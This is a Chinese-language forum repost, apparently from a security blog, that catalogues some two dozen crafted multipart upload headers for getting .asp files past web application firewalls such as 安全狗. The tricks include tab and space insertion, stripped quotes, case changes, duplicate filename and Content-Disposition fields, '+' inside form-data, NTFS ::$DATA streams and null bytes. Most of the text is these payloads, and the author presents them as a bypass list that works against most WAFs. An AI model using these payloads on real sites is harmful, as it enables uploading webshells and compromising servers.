上传绕过WAF

默认状态

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破0

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename="[0x09]a.asp"

Content-Type: text/html[/mw_shl_code]


突破1 去掉双引号

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename=a.asp

Content-Type: text/html[/mw_shl_code]


突破2 添加一个filename1

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename="a.asp";filename1="test.jpg"

Content-Type: text/html[/mw_shl_code]


突破3 form中间+

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: f+orm-data; name="filepath";filename="test.asp"

Content-Type: text/html[/mw_shl_code]


突破4 大小写

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破5 去掉form-data

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破6 在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格

[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code][/mw_shl_code]


突破7 a.asp . (空格+.)

[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name="filepath"; filename="a.asp ."

Content-Type: text/html[/mw_shl_code][/mw_shl_code]


突破8 “换行

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name="filepath"; filename="a.asp

"

Content-Type: text/html[/mw_shl_code]


突破9 NTFS流 

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name="filepath"; filename="test.asp::$DATA"

Content-Type: text/html


——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name="filepath"; filename="test.asp::$DATA\0x00\fuck.asp0x00.jpg"

Content-Type: text/html[/mw_shl_code]


突破10 经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传test.asp成功]:

[mw_shl_code=bash,true]Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"


—————————–15377259221471


Content-Disposition: form-data; name="FileUploadName"; filename="test.txt"


Content-Type: application/octet-stream


Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"

Content-Disposition: form-data;

name="FileUploadName"; filename="test.asp"[/mw_shl_code]


突破11 换位

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Type: text/html

ConTent-Disposition: form-data; name="filepath"; filename="a.asp"[/mw_shl_code]


       在上述的方法中,还有些方法可以过安全狗,也可以过D盾、360网站卫士等等。另外从上述方法中,若按你们的想法,会分成那些类型?我在这里统一划分为特性和WAF解析不当(PS下,我不是学术派,较口语化)i,特性包括系统特性,协议特性等等,比如上述中,大多数都属于协议的特性,因为FORM-DATA的协议十分松散;部分属于系统特性,比如加空格、点号、NTFS流等等。而解析不当,比如上述的第二种添加一个filename1,这种在正常情况下无法使用的,如果第0种,对特殊字符无法解析,归根到底也是WAF对内容解析的不当处理。

针对于特性,在上传这一块,好像能用到的就只有系统特性和协议特性,系统特性从系统出现到现在才挖掘出那么一点点,对于我等菜鸟而言,就更难挖掘了。于是我们就把目光放到协议上。


默认状态

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


上述方法我们已经开始测试,那么,有没有想过。既然你们想得到用window特性来+空格,有没有想过用协议来+-空格


突破方法001

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition:form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法002

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition:  form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法003

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename="a.asp"

Content-Type:text/html[/mw_shl_code]


突破方法004

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename= “a.asp"

Content-Type:text/html[/mw_shl_code]


突破方法005

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data;  name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


上述就5种方法了,然后呢,空格可以,谁可以代替空格,tab?咱们来试试

突破方法006

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition:     form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法007

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data;      name="uploaded"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法008

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename=    "a.asp"

Content-Type: text/html[/mw_shl_code]


上面的方法可以延伸很多种了,记住一点,什么可以替换空格!


接下来,我们在根据之前公布的方法 ,大小写

突破方法009

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-disposition: form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法010

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: Form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法011

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; Name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法012

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; Filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法013

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name="filepath"; filename="a.asp"

Content-type: text/html[/mw_shl_code]


然后,这里在针对一个漏洞结合下,记得form-data中见存在一个+号吗,为什么不能放到前面或者后面


突破方法014

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: +form-data; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


突破方法015

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data+; name="filepath"; filename="a.asp"

Content-Type: text/html[/mw_shl_code]


列举了15种方法,不过也才3个技巧,我们也仅仅拿安全狗做演示,但是方法可以绕过目前大部分waf了,即使防住了,结合下有时候会出现超乎想像的结果。另外说下,其他的方法,还有不下20种,我记得某一妹子和我讲过,hack技术在于mind,不受约束,你会发现更多好玩的。

对于解析这块,就靠大家自己去fuzz了,放出来就淹死啦!


转载自Legend‘s BLog


评论回复